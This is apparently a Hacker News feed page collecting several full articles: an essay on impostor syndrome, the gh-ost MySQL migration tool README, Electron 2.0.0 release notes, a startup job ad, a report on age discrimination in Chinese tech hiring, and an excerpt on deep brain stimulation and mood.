Quantcast
Channel: Hacker News
Viewing all 25817 articles
Browse latest View live

A strong correlation between impostor syndrome and anxiety, depression, burnout

$
0
0

Authors:
Elizabeth Churchill

back to top 

“What do you do about stress?” she asked.
“What do you mean by stress?”
“Well… I feel like I will never fit in, like I’ll never be smart enough.
And that makes me stressed all the time.
Does that make sense?”

The young woman with whom I was speaking is the first in her family to enter a Ph.D. program. She excelled in her computer science undergraduate degree. She was admitted to an elite university to study with a key figure in HCI. By all accounts, she is doing extremely well. But she has doubts. Not about the institution, or her supervisor, or her topic, about which she is deeply passionate: She has doubts about herself and her worthiness to be in the program at all.

This is a conversation I have too frequently. It’s a conversation I have with people at all stages of career, sometimes even with my peers. In these conversations, people express fears that they don’t really belong, that they are interlopers who aren’t really “clever enough” or “good enough” or “well-rounded enough” or “deep enough” in their discipline. The fear is that they will be discovered to be in some way wanting, and that they will then be cast out, let go, fired from their positions—the fear of discovery that they are not good enough sometimes overwhelms them.

Over four decades ago, this feeling was found to be very common among high-achieving women; it was given a name, impostor syndrome, by clinical psychologists Pauline Clance and Suzanne Imes in the late 1970s [1]. Follow-on research has shown that impostor syndrome is very real and very prevalent, and that its effects are undeniably negative. Impostor syndrome is associated with overwork, with an overly keen focus on pleasing others, and with an almost desperate drive to constantly achieve more. It is therefore also unsurprising that there is a strong correlation between impostor syndrome and anxiety, stress, depression, and burnout, the debilitating condition of exhaustion that can result in talented individuals giving up on promising careers.

While the initial work that led to the coining of this term focused on women’s experiences of non-belonging and of “impostoritis,” and much published work since has also focused on women, men are not immune to impostor syndrome. I asked some of my male colleagues whether they also experience impostor syndrome and got a resounding yes. In researching the topic for this column, I read an article that suggested even Albert Einstein felt this way at times.

In her book The Secret Thoughts of Successful Women: Why Capable People Suffer from the Impostor Syndrome and How to Thrive in Spite of It, Valerie Young breaks down impostor syndrome and adds nuance, describing different kinds of impostor and their behaviors:

  • The Expert. This manifests as a state of cringing denial when called an expert. It is associated with a constant feeling that there is so much more to know, so much more to do. There is a deep fear of being found out as not knowing everything in the area of work. This can lead to feeling like one doesn’t deserve the job one has.
  • The Perfectionist. Perfectionism underlies a feeling that one could have (and should have) done better. No matter how well the task was done, there is no accepting of compliments and no celebration of achievements. Sometimes there isn’t even a noticing of success, so it is no surprise that self-confidence does not develop.
  • The Superwoman/man. Some people can’t stop working, taking on every task they can. Young argues that this kind of workaholism is the expression of a need for external validation and can be countered only by focusing on setting one’s own metrics for personal success.
  • The Natural Genius. This behavior involves judging one’s worth on the basis of raw ability as opposed to effort. Tendencies toward ridiculously high expectations are coupled with and amplified by the expectation that one will be successful on a first try—the perfect setup for feelings of inadequacy and failure, especially in complex domains.
  • The Rugged Individualist. Rugged individualism demands that all tasks be performed alone, and little to no help is sought. Projects are always framed in terms of their requirements, and personal needs are pushed aside in honor of project demands.

I am sure we all recognize some of these tendencies, and clearly they are linked. One may also feel one kind of anxiety one day and another the next.


There is a strong correlation between impostor syndrome and anxiety, stress, depression, and burnout.


My hunch is that people who are creative, who strive to solve hard problems, who think about the bigger picture, and who are engaged with their topics are the most likely to suffer from impostor syndrome. This makes sense—if you’re constantly striving toward creative expression that pushes the preconceptions of a topic area and that is truly reflective and/or innovative work, you’re likely to focus on what you don’t know so you can chart your learning path. For those who are always challenging themselves and who are facing hard problems, some level of uncertainty is inevitable. These are characteristics of the most creative, inventive minds. But constant self-questioning is a hole through which confidence leaks, creating fertile ground for overwork and negative stress. The classic Yerkes-Dodson law comes to mind in the context of this kind of striving:

The Yerkes-Dodson law is an empirical relationship between arousal and performance, originally developed by psychologists Robert M. Yerkes and John Dillingham Dodson in 1908. The law dictates that performance increases with physiological or mental arousal, but only up to a point [2].

So, when the stress is just right, people will grow by leaps and bounds and be motivated to push forward, learn, and engage with challenges. This is positive stress. As stress increases, there is a point of diminishing returns. At high levels of stress, the person will become debilitated. It is likely that impostor syndrome is spun from such heightened stress and anxiety, as self-questioning sets in around the fear of failure, amplifying the worry further and potentially creating a self-fulfilling prophecy.

Before we place too much emphasis on the individual and their striving, though, it is important to note that the feeling of being in an unsafe or precarious situation professionally is not simply a personal trait or tendency. It can and usually is created and maintained by structural biases and very real inequities in one’s social and work environments. There is much evidence that the environment will trigger, feed, and exacerbate impostor syndrome. Feeling like an impostor in one’s professional identity may be triggered or exacerbated by noticing one does not belong in other ways—being part of a minority group that is culturally not the dominant one means one is already an interloper. If you don’t see yourself and your values reflected around you, you may already feel as if you are hiding your difference. At the same time, you’re spending energy looking for validation and looking to sense, ameliorate, and/or avoid subtle rejections.

ins01.gif

Research indicates that the culture of an organization or institution is a big factor in whether people feel like they belong and can take risks. One’s sense of belonging and social standing in a work or social context makes all the difference in how one perceives and judges success and failure, and whether one feels the need to hide and guard against taking a “wrong step” or failing at a task. A lack of social belonging can reduce the kind of emotional buoyancy that allows one to realistically evaluate and bounce back from failure, actual or perceived. Cultural programming is also very real. Bragging about your achievements is not considered polite in many cultures; as a U.K. to U.S. transplant, I can attest to the shift I had to go through when I moved to the U.S.

This is perhaps why women may be more likely to feel like impostors, because they typically do not see themselves reflected and reinforced—in some sense, validated—in the same way that men do.

I think impostor syndrome and the concomitant compensatory behaviors are likely to become even more prevalent. Attrition rates in computer science education are high, especially among women and the most creative students, who seek to be interdisciplinary [3]. The current career milieu is also sending a message to creative people that they need to be actively in control of their careers, and that stable work with the commitment of an organization for long-term career development is increasingly tenuous. More and more, careers require self-direction and reflection; there are fewer straight paths to lasting, fulfilling work. That means a great deal of emotional strength is needed to carve out one’s career while avoiding imposteritis and burn out: Forging your own career path takes courage and belief in self, while success is ever more dependent on external validation and social networking.

As an HCI and user experience manager with many creative and bright individuals on my team, I look for people who are willing to challenge the status quo, who bring creative and critical reflection to the table, who are not paralyzed by perfectionism or fear of countering my opinion, and who are oriented to taking risks and learning. Feelings of inadequacy and low self-confidence will drive out argument and creativity and lead to unproductive people-pleasing. We must look at ourselves and others, and recognize if we are starting to experience impostor syndrome or act in such a way as to induce it in others. If you feel this is happening, there are various things you can do to address it (see sidebar).

Cycling back to the young woman whose question sparked my reflections on this all too important topic, I think you might guess what I said to her:

“Oh yes, I am very familiar with that feeling. I actively work on diverting it into a positive challenge rather than a self-abnegation.”

back to top References

1. More on Impostor Syndrome can be found in the Wikipedia article: https://en.wikipedia.org/wiki/Impostor_syndrome

2. For more on this see the original article or the Wikipedia entry: Yerkes, R.M. and Dodson, J.D. The relation of strength of stimulus to rapidity of habit-formation. Journal of Comparative Neurology and Psychology 18 (1908), 459–482; DOI: 10.1002/cne.920180503 and https://en.wikipedia.org/wiki/Yerkes%E2%80%93Dodson_law

3. Many panels have been convened on impostor syndrome, e.g., Feldman, A.L. and McCullough, M. Fighting impostor syndrome (abstract only). Proc. of the 45th ACM Technical Symposium on Computer Science Education. ACM, New York, USA, 2014, 728–728. DOI: http://dx.doi.org/10.1145/2538862.2544236. Also see this Grace Hopper panel: https://www.youtube.com/watch?v=EAw6xWd_Hec

back to top Author

Originally from the U.K., Elizabeth Churchill has been leading corporate research at top U.S. companies for the past 18 years. Her research interests include social media, distributed collaboration, mediated communication, and ubiquitous and embedded computing applications. churchill@acm.org

back to top Sidebar: Dealing with Impostor Syndrome

Treat yourself well.

  • Prioritize your whole self and your overall well-being; you are more than what you do in your course, in your team, or in your organization.
  • Recognize and quell internal monologues of failure or less than optimal performance.
  • Don’t get into unhealthy competition with yourself.
  • Laugh at yourself with compassion.
  • Allow yourself to brag about your successes, and don’t take anyone who teases you about it seriously.

Create your support group; seek positive teachers and mentors.

  • Talk about concerns you have and take feedback, especially positive feedback, seriously.

Manage your relationship with/to work.

  • Remember the reasons why you got into your line of work. And if you find it was because someone else told you to do it and you really don’t care, change your line of work. Allow yourself to consider that perhaps you just aren’t that interested in the topic you used to love. Some of the most successful people have thrived in multiple areas.
  • Establish realistic yardsticks and take input from others on whether goals are achievable.

Understand the natural cycles of knowledge and expertise.

  • Know that knowledge shifts and morphs. You’ll know more about some topics tomorrow, and you’ll forget some things you knew before. Forgive yourself for changing. You may not be as good at something if you haven’t practiced for a while.
  • Let yourself be a novice when you approach a new topic. Force yourself to ask for help, and if you don’t get positive encouragement from the first person you ask, move on and ask someone else until you find someone who loves the topic and loves to learn and loves to encourage others to learn. The keenest minds and deepest domain experts are the ones who truly enjoy sharing their knowledge and inviting others to the party. The dismissive people may themselves be suffering from impostor syndrome.

Understand the importance of culture.

  • Note your cultural programming—are you really feeling like an impostor, or are you afraid to admit you’re good at what you do for fear of being called arrogant? Look for personal cultural differences around bragging, self-promotion, competition, and contribution, including taking responsibility for an honest audit of your own cultural or personal biases.
  • Don’t introduce unhealthy competition into your teams, whether you are a manager or a peer.
  • Introduce play and playfulness into the work world.
  • Know that in 95 percent of situations, you’re part of a bigger social system and you don’t have to do it all. Nor are you responsible for it all. Learn to recognize the traits of toxic settings, situations, and organizations, and if you can’t institute or effect change, leave.

back to top 

Copyright held by authors

The Digital Library is published by the Association for Computing Machinery. Copyright © 2018 ACM, Inc.


GitHub's online schema migration for MySQL

$
0
0

README.md

build statusdownloadsrelease

GitHub's online schema migration for MySQL

gh-ost is a triggerless online schema migration solution for MySQL. It is testable and provides pausability, dynamic control/reconfiguration, auditing, and many operational perks.

gh-ost produces a light workload on the master throughout the migration, decoupled from the existing workload on the migrated table.

It has been designed based on years of experience with existing solutions, and changes the paradigm of table migrations.

How?

All existing online-schema-change tools operate in similar manner: they create a ghost table in the likeness of your original table, migrate that table while empty, slowly and incrementally copy data from your original table to the ghost table, meanwhile propagating ongoing changes (any INSERT, DELETE, UPDATE applied to your table) to the ghost table. Finally, at the right time, they replace your original table with the ghost table.

gh-ost uses the same pattern. However it differs from all existing tools by not using triggers. We have recognized the triggers to be the source of many limitations and risks.

Instead, gh-ostuses the binary log stream to capture table changes, and asynchronously applies them onto the ghost table. gh-ost takes upon itself some tasks that other tools leave for the database to perform. As result, gh-ost has greater control over the migration process; can truly suspend it; can truly decouple the migration's write load from the master's workload.

In addition, it offers many operational perks that make it safer, trustworthy and fun to use.

gh-ost general flow

Highlights

  • Build your trust in gh-ost by testing it on replicas. gh-ost will issue same flow as it would have on the master, to migrate a table on a replica, without actually replacing the original table, leaving the replica with two tables you can then compare and satisfy yourself that the tool operates correctly. This is how we continuously test gh-ost in production.
  • True pause: when gh-ostthrottles, it truly ceases writes on master: no row copies and no ongoing events processing. By throttling, you return your master to its original workload
  • Dynamic control: you can interactively reconfigure gh-ost, even as migration still runs. You may forcibly initiate throttling.
  • Auditing: you may query gh-ost for status. gh-ost listens on unix socket or TCP.
  • Control over cut-over phase: gh-ost can be instructed to postpone what is probably the most critical step: the swap of tables, until such time that you're comfortably available. No need to worry about ETA being outside office hours.
  • External hooks can couple gh-ost with your particular environment.

Please refer to the docs for more information. No, really, read the docs.

Usage

The cheatsheet has it all. You may be interested in invoking gh-ost in various modes:

  • a noop migration (merely testing that the migration is valid and good to go)
  • a real migration, utilizing a replica (the migration runs on the master; gh-ost figures out identities of servers involved. Required mode if your master uses Statement Based Replication)
  • a real migration, run directly on the master (but gh-ost prefers the former)
  • a real migration on a replica (master untouched)
  • a test migration on a replica, the way for you to build trust with gh-ost's operation.

Our tips:

  • Testing above all, try out --test-on-replica first few times. Better yet, make it continuous. We have multiple replicas where we iterate our entire fleet of production tables, migrating them one by one, checksumming the results, verifying migration is good.
  • For each master migration, first issue a noop
  • Then issue the real thing via --execute.

More tips:

  • Use --exact-rowcount for accurate progress indication
  • Use --postpone-cut-over-flag-file to gain control over cut-over timing
  • Get familiar with the interactive commands

Also see:

What's in a name?

Originally this was named gh-osc: GitHub Online Schema Change, in the likes of Facebook online schema change and pt-online-schema-change.

But then a rare genetic mutation happened, and the c transformed into t. And that sent us down the path of trying to figure out a new acronym. gh-ost (pronounce: Ghost), stands for GitHub's Online Schema Transmogrifier/Translator/Transformer/Transfigurator

License

gh-ost is licensed under the MIT license

gh-ost uses 3rd party libraries, each with their own license. These are found here.

Community

gh-ost is released at a stable state, but with mileage to go. We are open to pull requests. Please first discuss your intentions via Issues.

We develop gh-ost at GitHub and for the community. We may have different priorities than others. From time to time we may suggest a contribution that is not on our immediate roadmap but which may appeal to others.

Please see Coding gh-ost for a guide to getting started developing with gh-ost.

Download/binaries/source

gh-ost is now GA and stable.

gh-ost is available in binary format for Linux and Mac OS/X

Download latest release here

gh-ost is a Go project; it is built with Go 1.8 (though 1.7 should work as well). To build on your own, use either:

  • script/build - this is the same build script used by CI hence the authoritative; artifact is ./bin/gh-ost binary.
  • build.sh for building tar.gz artifacts in /tmp/gh-ost

Generally speaking, master branch is stable, but only releases are to be used in production.

Authors

gh-ost is designed, authored, reviewed and tested by the database infrastructure team at GitHub:

Electron 2.0.0

$
0
0

After more than four months of development, eight beta releases, and worldwide testing from many apps' staged rollouts, the release of Electron 2.0.0 is now available from electronjs.org.


Starting with 2.0.0, Electron's releases will follow semantic versioning. This means the major version will bump more often and will usually be a major update to Chromium. Patch releases should be more stable because they will contain only high-priority bug fixes.

Electron 2.0.0 also represents an improvement to how Electron is stabilized before a major release. Several large scale Electron apps have included 2.0.0 betas in staged rollouts, providing the best feedback loop Electron's ever had for a beta series.

  • Major bumps to several important parts of Electron's toolchain, including Chrome 61, Node 8.9.3, V8 6.1.534.41, GTK+ 3 on Linux, updated spellchecker, and Squirrel.
  • In-app purchases are now supported on MacOS. #11292
  • New API for loading files. #11565
  • New API to enable/disable a window. #11832
  • New API app.setLocale(). #11469
  • New support for logging IPC messages. #11880
  • New menu events. #11754
  • Add a shutdown event to powerMonitor. #11417
  • Add affinity option for gathering several BrowserWindows into a single process. #11501
  • Add the ability for saveDialog to list available extensions. #11873
  • Support for additional notification actions #11647
  • The ability to set macOS notification close button title. #11654
  • Add conditional for menu.popup(window, callback)
  • Memory improvements in touchbar items. #12527
  • Improved security recommendation checklist.
  • Add App-Scoped Security scoped bookmarks. #11711
  • Add ability to set arbitrary arguments in a renderer process. #11850
  • Add accessory view for format picker. #11873
  • Fixed network delegate race condition. #12053
  • Changed to make sure webContents.isOffscreen() is always available. #12531
  • Fixed BrowserWindow.getFocusedWindow() when DevTools is undocked and focused. #12554
  • Fixed preload not loading in sandboxed render if preload path contains special chars. #12643
  • Correct the default of allowRunningInsecureContent as per docs. #12629
  • Fixed transparency on nativeImage. #12683
  • Fixed issue with Menu.buildFromTemplate. #12703
  • Confirmed menu.popup options are objects. #12330
  • Removed a race condition between new process creation and context release. #12361
  • Update draggable regions when changing BrowserView. #12370
  • Fixed menubar toggle alt key detection on focus. #12235
  • Fixed incorrect warnings in webviews. #12236
  • Fixed inheritance of 'show' option from parent windows. #122444
  • Ensure that getLastCrashReport() is actually the last crash report. #12255
  • Fixed require on network share path. #12287
  • Fixed context menu click callback. #12170
  • Fixed popup menu position. #12181
  • Improved libuv loop cleanup. #11465
  • Fixed hexColorDWORDToRGBA for transparent colors. #11557
  • Fixed null pointer dereference with getWebPreferences api. #12245
  • Fixed a cyclic reference in menu delegate. #11967
  • Fixed protocol filtering of net.request. #11657
  • WebFrame.setVisualZoomLevelLimits now sets user-agent scale constraints #12510
  • Set appropriate defaults for webview options. #12292
  • Improved vibrancy support. #12157#12171#11886
  • Fixed timing issue in singleton fixture.
  • Fixed broken production cache in NotifierSupportsActions()
  • Made MenuItem roles camelCase-compatible. #11532
  • Improved touch bar updates. #11812, #11761.
  • Removed extra menu separators. #11827
  • Fixed Bluetooth chooser bug. Closes #11399.
  • Fixed macos Full Screen Toggle menu item label. #11633
  • Improved tooltip hiding when a window is deactivated. #11644
  • Migrated deprecated web-view method. #11798
  • Fixed closing a window opened from a browserview. #11799
  • Fixed Bluetooth chooser bug. #11492
  • Updated to use task scheduler for app.getFileIcon API. #11595
  • Changed to fire console-message event even when rendering offscreen. #11921
  • Fixed downloading from custom protocols using WebContents.downloadURL. #11804
  • Fixed transparent windows losing transparency when devtools detaches. #11956
  • Fixed Electron apps canceling restart or shutdown. #11625

macOS

  • Fixed event leak on reuse of touchbar item. #12624
  • Fixed tray highlight in darkmode. #12398
  • Fixed blocking main process for async dialog. #12407
  • Fixed setTitle tray crash. #12356
  • Fixed crash when setting dock menu. #12087

Linux

Windows

  • Added Visual Studio 2017 support. #11656
  • Fixed passing of exception to the system crash handler. #12259
  • Fixed hiding tooltip from minimized window. #11644
  • Fixed desktopCapturer to capture the correct screen. #11664
  • Fixed disableHardwareAcceleration with transparency. #11704

The Electron team is hard at work to support newer versions of Chromium, Node, and v8. Expect 3.0.0-beta.1 soon!

GiveCampus (YC S15) hiring front-end engineers who care about education

$
0
0

PARTNER SUCCESS LEAD

At GiveCampus, we don’t just provide schools with awesome technology. We actively partner with them to make sure they get maximum value from that technology. And we invest heavily in gathering and sharing data and analytics, best practices, and lessons learned.

We are searching for a top-notch Partner Success Lead to enhance and expand these efforts. This person will own all elements of the GiveCampus partner experience: product, process, and everything in between. They will be a core part of our team and serve as the primary interface for schools using GiveCampus. Broadly speaking, they will be in charge of optimizing schools’ use of GiveCampus, partner renewal/retention, and supporting the expansion of partnerships over time.

Responsibilities will include:

  • Onboarding new partners: Understanding their needs and requirements, the priorities and pain points they want to address, what they want to achieve, and how they will measure success; and familiarizing them with GiveCampus, the benefits of specific features/functionality, and how other schools use the platform.
  • Helping schools set up and run campaigns on GiveCampus; proactively sharing best practices; and, when appropriate, engaging schools to prevent sub-optimal results.
  • Producing content to educate schools about GiveCampus capabilities, the value of specific features and functionality, and examples of how schools can benefit from them (e.g., knowledge base articles/blog posts, newsletters, in-product “How to” guides, FAQs, and training materials).
  • Tracking and analyzing partner usage of GiveCampus, success rates/trends, and satisfaction; engaging partners accordingly and modifying processes to improve outcomes in all of these areas (e.g., to increase platform usage) and minimize churn.
  • Implementing an efficient system for communicating with partners and tracking those communications.
  • Gathering feedback from schools and collaborating with our designers and engineers to translate this feedback into platform enhancements, new features, etc. (Note: The Partner Success Lead will play a significant role in shaping our product roadmap.)
  • Conducting periodic (~quarterly) reviews with each partner to understand their evolving needs and priorities and ensure that they are getting their expected value out of GiveCampus.
  • Generating intellectual capital regarding GiveCampus and digital fundraising and engagement writ large (e.g., best practices, lessons learned, data/analytics, etc.); managing distribution of this intellectual capital to our partners.
  • Working closely with our sales team to maximize renewal/retention and make partners aware of new opportunities as we expand our product and services.
  • Working closely with our marketing team to ensure our marketing strategy is aligned with the key value our partners derive from GiveCampus; identifying success stories for testimonials and case studies that highlight this value.

Key things we'll be looking for:

  • An engaging personality, a healthy sense of humor, and exceptional people skills (e.g., someone we want to get stuck in an airport with).
  • Customer-facing experience such as sales, account management, customer success, customer support, and/or consulting (extra credit if this experience is related to SaaS products, B2B or enterprise sales, and/or the education or non-profit market).
  • Empathy and exceptional listening skills--you need to be able to get to the bottom of all sorts of questions.
  • The ability to communicate clearly and concisely, including when explaining new technology or unfamiliar concepts.
  • An appreciation for the critical importance of EVERY interaction.
  • Keen attention to detail and an obsession with providing delightful partner experiences.

Extra credit if you have:

  • Experience working in advancement/development or alumni relations at an educational institution or other non-profit.
  • Experience at a tech start-up.
  • Experience with crowdfunding, peer-to-peer fundraising, or other fundraising activities.
  • Volunteered to help a school raise money or engage its alumni (e.g., as a “class agent”, “class chair/ambassador”, or “reunion committee member”).
  • Experience with customer relationship management (CRM) software such as Salesforce, Sugar CRM, or Close.io.

Back to Top

Over 30? Too Old for Tech Jobs in China

$
0
0

Ou Jianxin said goodbye to his wife and two young children shortly after 9 a.m. on a cold day last December. He was on his way to Chinese smartphone maker ZTE Corp.’s Shenzhen headquarters—he’d been let go from his job as a research engineer at the company more than a week before, but management had asked to speak with him again, he said. “There are internal conflicts in our company,” he told his wife. “I’m very likely to be the victim of that.” Whether there was an actual meeting is unclear. What is clear is that sometime after he arrived, Ou went to his former office on the 26th floor of the campus’s research and development building and jumped to his death. He was 42 years old.

Four days later, Ou’s widow wrote a post on the blogging platform Meipian about her husband and the circumstances of his death. According to her account, ZTE refused to give a reason for Ou’s dismissal. Neither Ou’s widow nor representatives from ZTE responded to requests for comment, though Ou’s widow took down her post, according to the site, within two days after a reporter from Bloomberg Businessweek attempted to contact the company.

Nevertheless, Ou’s story took on a life of its own. In its four months online, the Meipian post became a viral phenomenon—the platform registered only that it had been viewed more than 100,000 times, but via media coverage and word-of-mouth, the story would have reached millions. Why ZTE let Ou go remains a mystery, as does Ou’s reason for ending his life. But to the people discussing his story online, none of that mattered. Almost immediately, readers seized on his age: At 42, he would have already been considered too old to be an engineer in China, where three-quarters of tech workers are younger than 30, according to China’s largest jobs website, Zhaopin.com. The online discussion gave vent to an anxiety that’s been building for years. Chinese internet users call it the “30+ middle-aged crisis.”

Despite her bobbed black hair, smooth complexion, and schoolgirlish appearance, Helen He, a tech recruiter in Shanghai, is well-acquainted with age-related pressures: Now 38, she’s been told by her bosses not to recruit anyone older than 35. “Most people in their 30s are married and have to take care of their family—they’re not able to focus on the high-intensity work,” she says, parroting the conventional wisdom, though she also may be talking about her own future should she find herself back on the job market. “If a 35-year-old candidate isn’t seeking to be a manager, a hiring company wouldn’t even give that CV a glance.”

The idealization of youth is in the DNA of the American tech industry. Steve Jobs, Bill Gates, and Mark Zuckerberg all famously dropped out of college to start Apple, Microsoft, and Facebook, respectively, and imbued their companies’ culture with a puckish distrust of authority. Google has been fighting an age-related class-action suit in California since 2015, and in March, a ProPublica investigation showed that International Business Machines Corp. cut 20,000 older employees in the U.S. in the past five years to “sharply increase hiring of people born after 1980.” Both companies say they comply with employment laws.

In China the discrimination begins even younger than in the U.S. The irony is that most of the country’s famous tech companies were started by men older than 30. Lei Jun founded smartphone maker Xiaomi Inc., expected to go public this year with a valuation of at least $80 billion, at age 40. Jack Ma was 34 when he opened the online shopping colossus Alibaba Group Holding Ltd., and Robin Li was 31 when he built the search engine Baidu. An exception among the current leaders is Tencent Holdings Ltd.’s Pony Ma, who was 27 when he created the company behind the popular social media app WeChat. The industry’s rising generation, however—Cheng Wei of taxi app Didi Chuxing and Zhang Yiming of news app Toutiao—established their business in their 20s.

The pressure on older workers exists across China’s industries, but it’s particularly acute in tech, where the frenzy to hire young talent reveals the extent of the country’s desire to prove itself as a global leader. China has used tech advancements to propel its economy forward for decades, but President Xi Jinping’s Made in China 2025 plan kicked activity into a higher gear. As Xi’s political power has grown, so has the urgency in the industry to carry out his ambition: to dominate the world in advanced technologies, including semiconductors and artificial intelligence.

On its face, Ou’s death bears similarities to the wave of suicides among low-wage workers at Foxconn Technology Group factories in 2010 and 2011, which were widely attributed to labor abuses. What readers responded to in his story, though, is of a different nature. In a country of 1.4 billion people, many Chinese tech companies are able to move faster than their overseas rivals by throwing people at a problem, and younger workers cost less than their more experienced colleagues. Anxious to keep up with fierce competition, Chinese internet companies often expect their employees to work a so-called 996 schedule: 9 a.m. to 9 p.m., 6 days a week, including holidays. After age 30, tech recruiter He wrote in a post on the question-and-answer website Zhihu, it’s harder to recover from late nights, and as your priorities shift from job to family, working overtime becomes a greater burden. “In HR,” she says, “I’ve found that 30 years old is already the beginning of the middle-aged crisis.”

Photographer: Molly Cranna for Bloomberg Businessweek

A search on Zhaopin.com reveals tens of thousands of job postings calling for applicants younger than 35: They include one from e-commerce retailer JD.com Inc. seeking someone with a master’s degree for a senior manager position and a sales position at travel website Ctrip for which applicants are required to be from 20 to 28. (JD.com says it strictly forbids hiring restrictions based on age or gender. Ctrip declined to comment.) A recent job posting for a front-end developer at a Beijing tech startup explained that the company is willing to relax its requirements for educational attainment but not for age; a college degree isn’t strictly necessary, but if you’re older than 30, don’t bother applying. “Working in tech is like being a professional athlete,” says Robin Chan, an entrepreneur and angel investor in companies such as Xiaomi and Twitter Inc. “You work extremely hard from 20 to 40 years old and hope you hit it big. After that, it’s time to move on to something else and let someone younger try their hand.”

China has national laws prohibiting discrimination based on gender, religion, and disability, but declining to hire someone based on age is perfectly legal. “Age-dismissal victims rarely ask for help from lawyers,” says Lu Jun, a social activist and visiting scholar at Fordham University School of Law who fought successfully for legislation prohibiting Chinese employers from discriminating against hepatitis B carriers, formerly a common practice. With no statutory basis for a lawsuit, direct action is rare, but there are other ways to apply pressure. In 2011 the Shenzhen Stock Exchange posted a recruitment notice on its website asking for applicants younger than 28. The director of a local nonprofit wrote an open letter about the listing to the municipal bureau of human resources and social security. The media picked up the story, and after the stock exchange conducted an investigation into the listing, it was taken down.

Public entities are particularly good targets because they’re often viewed as examples by the private sector—force the government to change, Lu says, and the effects will trickle down. Last fall, shortly before Ou’s story began circulating, human-rights lawyer Zhang Keke heard from several colleagues about a job listing for a clerk’s position in the public prosecutor’s office in Shenzhen. The upper age limit was 28. “I really can’t believe that such things could happen in Shenzhen, an open city compared with other cities in China,” he says. China’s fifth-largest city, Shenzhen is considered to be the nation’s Silicon Valley—in addition to ZTE, Tencent and Huawei are headquartered there—and as such it tends to be more progressive.

Zhang is known for taking on controversial cases, including defending members of the banned Falun Gong spiritual group, and belongs to a network of public-interest lawyers created two years ago to handle discrimination cases. He sent the Shenzhen job posting around to his network and eventually assembled a group of eight lawyers to write an open letter to the Shenzhen prosecutor’s office recommending that it replace age limits with a merit-based exam. They met with textbook bureaucratic runaround: After two months with no response, the lawyers sent their complaint letter to the provincial prosecutor’s office and the city’s personnel bureau, which handles HR issues for government agencies; the bureau punted the case to another judicial agency, which didn’t respond. They then sent the letter to the head of the Shenzhen prosecutor’s office, who explained that the age limit was set by party officials. The prosecutor’s office didn’t respond to requests for comment.

“It’s very common the government doesn’t do anything about it at first,” says Lu of complaints about government agencies. Zhang is considering bringing the case to other government authorities but has no firm plan yet. “This is just an idea at the moment,” he says. One of the other people involved, Wang Le, a 31-year-old lawyer from Hunan, says that as it’s the prosecutor’s duty to uphold the law, the office should be held to a higher standard than other government agencies. “Plus, we are all lawyers over age 28.”

Not everyone in China has responded to age-related hiring pressure by trying to fight it. There are those who say the system has taught them to work harder than their thirtysomething peers. Getting downsized out of his IT job at Nokia Corp. in Chengdu “pushed me to change and improve my skills to get a better job,” says Liu Huai Yi, 33. “I don’t buy the idea that after 35 you can’t get a job. Someone in IT has to just keep learning to keep up.” After searching for eight months, he was hired in another IT position at a multinational health-care company, which will offer more job security.

The competition for top tech talent has prompted higher salaries and relaxed age requirements for those skilled in complex fields such as AI and machine learning, which tend to require advanced degrees. If nothing else, China’s shifting age dynamics will force the issue. Forty-seven percent of China’s population is older than 40, up from 30 percent two decades ago, according to the World Bank Group. That number is projected to rise to 55 percent by 2030. Despite the end of the one-child policy, births fell last year to 17.2 million, from 18.5 million in 2016. He, the tech recruiter, remains hopeful that age discrimination will eventually disappear in China. A graying population means there will be fewer young candidates to choose from, she says. “If you have no more young employees, you will have no other choice.”

For now, He is preparing for the day she’ll be considered too old for her job. She has a second apartment in Shanghai that she rents out for extra cash, but she has also dreamed of writing a book and is banking on an encore career as an author and online influencer. She started a WeChat blog where readers can tip her if they like her articles, and along with more than a dozen fellow recruiters, she published an e-book in April on how companies can use WeChat to reach job candidates.

She advises others to follow her lead. “We worry that as we get older we might lose our jobs. How will we support our family and live a good life then?” asks He. “We have to start doing something about it now.” —With Mengchen Lu, Gao Yuan, and Charlie Zhu

Can You Overdose on Happiness?

$
0
0

It is a good question, but I was a little surprised to see it as the title of a research paper in a medical journal: “How Happy Is Too Happy?”

Yet there it was in a publication from 2012. The article was written by two Germans and an American, and they were grappling with the issue of how we should deal with the possibility of manipulating people’s moods and feeling of happiness through brain stimulation. If you have direct access to the reward system and can turn the feeling of euphoria up or down, who decides what the level should be? The doctors or the person whose brain is on the line?

What happiness looks like: Deep brain stimulation involves the implantation of electrodes in the brain, linked through the scalp (top) to wires (right) leading to a battery implanted below the skin. This sends electrical impulses to specific areas of the brain.Pasieka / Getty Images

The authors were asking this question because of a patient who wanted to decide the matter for himself: a 33-year-old German man who had been suffering for many years from severe obsessive-compulsive disorder and generalized anxiety syndrome. A few years earlier, the doctors had implanted electrodes in a central part of his reward system—namely, the nucleus accumbens. The stimulation had worked rather well on his symptoms, but now it was time to change the stimulator battery. This demanded a small surgical procedure since the stimulator was nestled under the skin just below the clavicle. The bulge in the shape of a small rounded Zippo lighter with the top off had to be opened. The patient went to the emergency room at a hospital in Tübingen to get everything fixed. There, they called in a neurologist named Matthis Synofzik to set the stimulator in a way that optimized its parameters. The two worked keenly on the task, and Synofzik experimented with settings from 1 to 5 volts. At each setting, he asked the patient to describe his feeling of well-being, his anxiety level, and his feeling of inner tension. The patient replied on a scale from 1 to 10.

The two began with a single volt. Not much happened. The patient’s well-being or “happiness level” was around 2, while his anxiety was up at 8. With a single volt more, the happiness level crawled up to 3, and his anxiety fell to 6. That was better but still nothing to write home about. At 4 volts, on the other hand, the picture was entirely different. The patient now described a feeling of happiness all the way up to the maximum of 10 and a total absence of anxiety.

“It’s like being high on drugs,” he told Synofzik, and a huge smile suddenly spread across his face, where before there had been a hangdog look. The neurologist turned up the voltage one more notch for the sake of the experiment, but at 5 volts the patient said that the feeling was “fantastic but a bit too much.” He had a feeling of ecstasy that was almost out of control, which made his sense of anxiety shoot up to 7.

The two agreed to set the stimulator at 3 volts. This seemed to be an acceptable compromise in which the patient was pretty much at the “normal” level with respect to both happiness and anxiety. At the same time, it was a voltage that would not exhaust the $5,000 battery too quickly. All well and good.

“It’s not my job as a neurologist to make people happy.”

But the next day when the patient was to be discharged, he went to Synofzik and asked whether they might not turn the voltage up anyway before he went home. He felt fine, but he also felt that he needed to be a “little happier” in the weeks to come.

The neurologist refused. He gave the patient a little lecture on why it might not be healthy to walk around in a state of permanent rapture. There were indications that a person should leave room for natural mood swings both ways. The positive events you encounter should be able to be experienced as such. The patient finally gave in and went home in his median state with an agreement to return for regular checkups.

